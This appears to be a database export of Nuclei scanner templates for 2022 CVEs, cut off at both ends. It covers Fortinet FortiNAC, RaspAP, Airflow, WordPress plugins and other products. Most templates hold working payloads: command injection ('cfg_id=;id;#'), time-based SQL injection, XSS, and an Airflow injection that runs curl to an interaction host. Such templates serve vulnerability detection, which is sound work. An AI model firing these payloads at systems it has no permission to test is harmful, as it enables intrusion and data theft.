Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n Content-Type: application/octet-stream\n\n \n\n --------------------------1cada150a8151a54--\n - |\n GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(header_3, \"text/html\")\n - status_code_3 == 200\n - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - var wpdevart.*\"ajaxNonce\":\"(.*?)\"\n internal: true\n# digest: 490a0046304402206624ff96893b99e563ed7e913f0e75dadca668f907e6df1e79304e5ab55b41af02204d1893aa291251d21b535495c2021849fc9174fdc13289d8fb011079eb6dca38:922c64590222798bb761d5b6d8e72950", "hash": "31d2e2343df915742e88421dd7c565b4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308584" }, "name": "CVE-2022-39952.yaml", "content": "id: CVE-2022-39952\n\ninfo:\n name: Fortinet FortiNAC - Arbitrary File Write\n author: dwisiswant0\n severity: critical\n description: |\n Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data loss.\n remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above.\n reference:\n - https://fortiguard.com/psirt/FG-IR-22-300\n - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/\n - https://github.com/horizon3ai/CVE-2022-39952\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39952\n - https://github.com/1f3lse/taiE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-39952\n cwe-id: CWE-668,CWE-73\n epss-score: 0.96445\n epss-percentile: 0.99548\n cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fortinet\n product: fortinac\n shodan-query: title:\"FortiNAC\"\n tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive\nvariables:\n boundaryId: \"{{hex_encode(rand_text_alphanumeric(16))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/configWizard/keyUpload.jsp\"\n\n body: |\n --{{boundaryId}}\n Content-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n {{randstr}}\n --{{boundaryId}}--\n\n headers:\n Content-Type: \"multipart/form-data; boundary={{boundaryId}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"zipUploadSuccess\"\n - \"SuccessfulUpload\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203cea582616645262451f278883a52ba23466fd71d17efc23fbe8aa5ee2a16c6a0220761185b2c6e66b8eb362c33c1f84a4517c8a9c07670e4e28002fe0ee4767c1ad:922c64590222798bb761d5b6d8e72950", "hash": "a09ef2aee997d7d4f42e432c7f5df826", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308585" }, "name": "CVE-2022-39960.yaml", "content": "id: CVE-2022-39960\n\ninfo:\n name: Jira Netic Group Export <1.0.3 - Missing Authorization\n author: For3stCo1d\n severity: medium\n description: |\n Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive data.\n remediation: |\n Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue.\n reference:\n - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e\n - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39960\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-39960\n cwe-id: CWE-862\n epss-score: 0.21326\n epss-percentile: 0.96012\n cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: netic\n product: group_export\n framework: jira\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2022,atlassian,jira,netic,unauth\n\nhttp:\n - raw:\n - |\n POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n groupexport_searchstring=&groupexport_download=true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"jiraGroupObjects\"'\n - '\"groupName\"'\n condition: and\n\n - type: word\n part: header\n words:\n - \"attachment\"\n - \"jira-group-export\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e48f19893d9a16ba855d6f9730af410be8edc4eab9b16ef74fe2b8efe0053ec70220188c3998530c97f55e5c698dfd34fd5a9db1a22759017498b1d094525c774be3:922c64590222798bb761d5b6d8e72950", "hash": "ac238732c333abacacc38b3499afe4e3", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308586" }, "name": "CVE-2022-39986.yaml", "content": "id: CVE-2022-39986\n\ninfo:\n name: RaspAP 2.8.7 - Unauthenticated Command Injection\n author: DhiyaneshDK\n severity: critical\n description: |\n A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39986\n - https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2\n - http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html\n - https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-39986\n cwe-id: CWE-77\n epss-score: 0.87977\n epss-percentile: 0.98588\n cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: raspap\n product: raspap\n shodan-query: http.favicon.hash:-1465760059\n tags: cve,cve2022,packetstorm,raspap,rce\n\nhttp:\n - raw:\n - |\n POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n cfg_id=;id;#\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d4276486bf740d5acd36f59842a4bb0b0c269c2f35c5b44b7636f342e3f67cea02204698566d89e3bfcb3a4f81b02a07c2ec2552a2b2c88e067bb333d25f7a346cf6:922c64590222798bb761d5b6d8e72950", "hash": "c7d60d4da3854b2b9a165e6469fa2925", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308587" }, "name": "CVE-2022-40022.yaml", "content": "id: CVE-2022-40022\n\ninfo:\n name: Symmetricom SyncServer Unauthenticated - Remote Command Execution\n author: DhiyaneshDK\n severity: critical\n description: |\n Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.\n remediation: |\n Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40022\n - https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB\n - https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url=\n - https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-40022\n cwe-id: CWE-77\n epss-score: 0.82869\n epss-percentile: 0.98341\n cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: microchip\n product: syncserver_s650_firmware\n shodan-query: html:\"Symmetricom SyncServer\"\n tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip\n\nhttp:\n - raw:\n - |\n POST /controller/ping.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}/controller/ping.php\n\n currentTab=ping&refreshMode=ðDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n part: body\n regex:\n - \"uid=([0-9(a-z)]+)\"\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100aa89454b284e35f82c58b79db719d9270edf456761c8aa7bded1254e7a8fd8fb022100a95aa00978443217fc6d8c9d178a21856ac5ac6e5aa0dcd44bcfb2ce9448c58d:922c64590222798bb761d5b6d8e72950", "hash": "ce9288ee6ed1703d55fb3dad9f622de3", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308588" }, "name": "CVE-2022-40032.yaml", "content": "id: CVE-2022-40032\n\ninfo:\n name: Simple Task Managing System v1.0 - SQL Injection\n author: r3Y3r53\n severity: critical\n description: |\n SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.\n reference:\n - https://www.exploit-db.com/exploits/51273\n - https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40032\n - http://packetstormsecurity.com/files/171739/Simple-Task-Managing-System-1.0-SQL-Injection.html\n - https://www.sourcecodester.com/sites/default/files/download/razormist/Task%20Managing%20System%20in%20PHP.zip\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-40032\n cwe-id: CWE-89\n epss-score: 0.00174\n epss-percentile: 0.54566\n cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: simple_task_managing_system_project\n product: simple_task_managing_system\n tags: cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /task/loginValidation.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n - 'status_code == 302'\n - \"contains(location, 'login.php')\"\n - 'contains(content_type, \"text/html\")'\n condition: and\n# digest: 4a0a0047304502205adf6288fe87134b556d34fbfea1ed592c7a42950b76ddfbb3c75d90cba774e7022100b0c41e62a09fa680a12f1210778fe7bf97dab393091e9727779d941a9f3a2056:922c64590222798bb761d5b6d8e72950", "hash": "a527e602f04342f43fadfd05421d8883", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308589" }, "name": "CVE-2022-40047.yaml", "content": "id: CVE-2022-40047\n\ninfo:\n name: Flatpress < v1.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40047\n - https://github.com/flatpressblog/flatpress/issues/153\n - http://flatpress.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-40047\n cwe-id: CWE-79\n epss-score: 0.00535\n epss-percentile: 0.76696\n cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: flatpress\n product: flatpress\n shodan-query: http.html:\"flatpress\"\n tags: cve,cve2022,flatpress,authenticated,xss,intrusive\nvariables:\n randstring: \"{{to_lower(rand_base(16))}}\"\n\nhttp:\n - raw:\n - |\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}\n\n ------WebKitFormBoundary{{randstring}}\n Content-Disposition: form-data; name=\"user\"\n\n {{username}}\n ------WebKitFormBoundary{{randstring}}\n Content-Disposition: form-data; name=\"pass\"\n\n {{password}}\n ------WebKitFormBoundary{{randstring}}\n Content-Disposition: form-data; name=\"submit\"\n\n Login\n ------WebKitFormBoundary{{randstring}}--\n - |\n GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"flatpress\")'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"onfocus=\\\"alert(document.domain)\")'\n condition: and\n# digest: 4a0a00473045022100fe7ff33760e6216455b976917c3895164eff5585432a53158db6e362b5c59bc702203d624f6051dbcc168fdd190e57fed04454c628d0500d5dffb611d8b5ec17e4ac:922c64590222798bb761d5b6d8e72950", "hash": "e6a3cd49136db22cdac9d504fd5cdd2f", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858a" }, "name": "CVE-2022-40083.yaml", "content": "id: CVE-2022-40083\n\ninfo:\n name: Labstack Echo 4.8.0 - Open Redirect\n author: pdteam\n severity: critical\n description: |\n Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,.\n remediation: Download and install 4.9.0, which contains a patch for this issue.\n reference:\n - https://github.com/labstack/echo/issues/2259\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40083\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n cvss-score: 9.6\n cve-id: CVE-2022-40083\n cwe-id: CWE-601\n epss-score: 0.0212\n epss-percentile: 0.88046\n cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: labstack\n product: echo\n tags: cve,cve2022,redirect,labstack\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}//interactsh.com%2f..\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: location\n regex:\n - '^\\s*//interactsh.com/\\.\\.'\n\n - type: status\n status:\n - 301\n# digest: 4b0a00483046022100fded3edccd5f1179bdb2580cb9d18c97d3dab9ced013e1e822c48bd48ccfb195022100b207d6a21963237237bf2129669404f2fb7e5100b1ae87859f861bbac456db4b:922c64590222798bb761d5b6d8e72950", "hash": "437c6ebb0da45263b1538e2c006edd02", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858b" }, "name": "CVE-2022-40127.yaml", "content": "id: CVE-2022-40127\n\ninfo:\n name: AirFlow < 2.4.0 - Remote Code Execution\n author: DhiyaneshDk,ritikchaddha\n severity: high\n description: |\n A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/Mr-xn/CVE-2022-40127\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40127\n - http://www.openwall.com/lists/oss-security/2022/11/14/2\n - https://github.com/apache/airflow/pull/25960\n - https://lists.apache.org/thread/cf132hgm6jvzvsbpsozl3plf1r4cwysy\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-40127\n cwe-id: CWE-94\n epss-score: 0.28782\n epss-percentile: 0.96752\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: apache\n product: airflow\n shodan-query: title:\"Sign In - Airflow\"\n tags: cve,cve2022,airflow,rce,oast,authenticated,apache\n\nhttp:\n - raw:\n - |\n GET /login/ HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /login/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n - |\n @timeout: 15s\n POST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"conf\": {\n \"dag_run\": \"{{randstr}}\"\n },\n \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'state\": \"queued\"'\n\n - type: word\n part: interactsh_protocol\n words:\n - dns\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf_token\n group: 1\n regex:\n - 'type=\"hidden\" value=\"(.*?)\">'\n internal: true\n# digest: 4a0a004730450220268a6975a87f86a812533542ac7994169de5175872889d429254a91734af5044022100b472c5440cfea767aec326fbd15a942a4d35efcd9f11e527f167068308b38d39:922c64590222798bb761d5b6d8e72950", "hash": "bd1a373b787cb164e20fd3b76bf8fcb0", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858c" }, "name": "CVE-2022-40359.yaml", "content": "id: CVE-2022-40359\n\ninfo:\n name: Kae's File Manager <=1.4.7 - Cross-Site Scripting\n author: edoardottt,daffainfo\n severity: medium\n description: |\n Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2022090057\n - https://code.google.com/archive/p/kfm/downloads\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40359\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-40359\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.46796\n cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: kfm_project\n product: kfm\n tags: cve,cve2022,xss,kfm,kfm_project\n\nhttp:\n - raw:\n - |\n GET /kfm/index.php/' HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"x_kfm_changeCaption\"\n - \"kfm_copyFiles\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220171d85e0f730e64868dee2a05909f6c686e599f48f3696442a181b69884cf50f022100c1f6c50e667cb2eb97f58eadec05e4db8a84fdda96907fa4c22f023609840b63:922c64590222798bb761d5b6d8e72950", "hash": "54c40e5f5d56128b48091ac1e10a3b3c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858d" }, "name": "CVE-2022-4049.yaml", "content": "id: CVE-2022-4049\n\ninfo:\n name: WP User <= 7.0 - Unauthenticated SQLi\n author: theamanrawat\n severity: critical\n description: |\n The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n reference:\n - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be\n - https://wordpress.org/plugins/wp-user/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4049\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4049\n cwe-id: CWE-89\n epss-score: 0.04217\n epss-percentile: 0.92045\n cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 4\n vendor: wp_user_project\n product: wp_user\n framework: wordpress\n publicwww-query: /wp-content/plugins/wp-user/\n tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project\n\nhttp:\n - raw:\n - |\n GET {{path}} HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)\n\n attack: clusterbomb\n payloads:\n path:\n - \"/index.php/user/\"\n - \"/user\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - duration>=6\n - status_code == 200\n - contains(header_2, \"text/html\")\n - contains(body_2, 'Invalid Access')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '\"wpuser_update_setting\":\"([0-9a-zA-Z]+)\"'\n internal: true\n# digest: 4a0a0047304502200bc446290576844df258d034022250c3aa6e8246bb5a19d65fa51e01ba5b35e4022100fc78eae46cc6546539a10fd2ec8828a404ac6f42e58cd5aed957844879de1ed6:922c64590222798bb761d5b6d8e72950", "hash": "3594cfc08ec176706f4c5a7c428fbb15", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858e" }, "name": "CVE-2022-4050.yaml", "content": "id: CVE-2022-4050\n\ninfo:\n name: WordPress JoomSport <5.2.8 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Update to JoomSport plugin version 5.2.8 or later.\n reference:\n - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f\n - https://wordpress.org/plugins/joomsport-sports-league-results-management/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4050\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4050\n cwe-id: CWE-89\n epss-score: 0.04713\n epss-percentile: 0.9246\n cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: beardev\n product: joomsport\n framework: wordpress\n tags: cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n mdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-\"}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"jscaruselcont jsview2\")'\n condition: and\n# digest: 4b0a00483046022100adc5764e0fcc369d16e68be00829b99d4fd95b2241bff1c6ef38c1a561fd9c1c0221008f5d90efe26e0150b8ed5e151209c27ebe6766cc9e70d08983c5696822fa55ce:922c64590222798bb761d5b6d8e72950", "hash": "f3b252eb0931de35c3ea0325baf74f8d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858f" }, "name": "CVE-2022-4057.yaml", "content": "id: CVE-2022-4057\n\ninfo:\n name: Autoptimize < 3.1.0 - Information Disclosure\n author: DhiyaneshDK\n severity: medium\n description: |\n The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.\n impact: |\n An attacker can gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability.\n reference:\n - https://wpscan.com/vulnerability/95ee1b9c-1971-4c35-8527-5764e9ed64af\n - https://wordpress.org/plugins/autoptimize/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4057\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-4057\n cwe-id: CWE-425\n epss-score: 0.00125\n epss-percentile: 0.46949\n cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: optimizingmatters\n product: autooptimize\n framework: wordpress\n publicwww-query: /wp-content/plugins/autoptimize\n tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html\"\n - \"{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Job id <'\n - 'log messages'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a0bf6688a368fac230bd01722ccc5ff4a0094c997d4bc9e929424d1b2811d3d6022100dbac1fd1415a66ee1b95e9b5ae6303e3cb1fed954b0b80af47c8665c3c6db65a:922c64590222798bb761d5b6d8e72950", "hash": "40dee9c2f797ea65cb737aaead92bca6", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308590" }, "name": "CVE-2022-4059.yaml", "content": "id: CVE-2022-4059\n\ninfo:\n name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection\n author: r3Y3r53\n severity: critical\n description: |\n The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n remediation: Fixed in version 2.0\n reference:\n - https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4059\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4059\n cwe-id: CWE-89\n 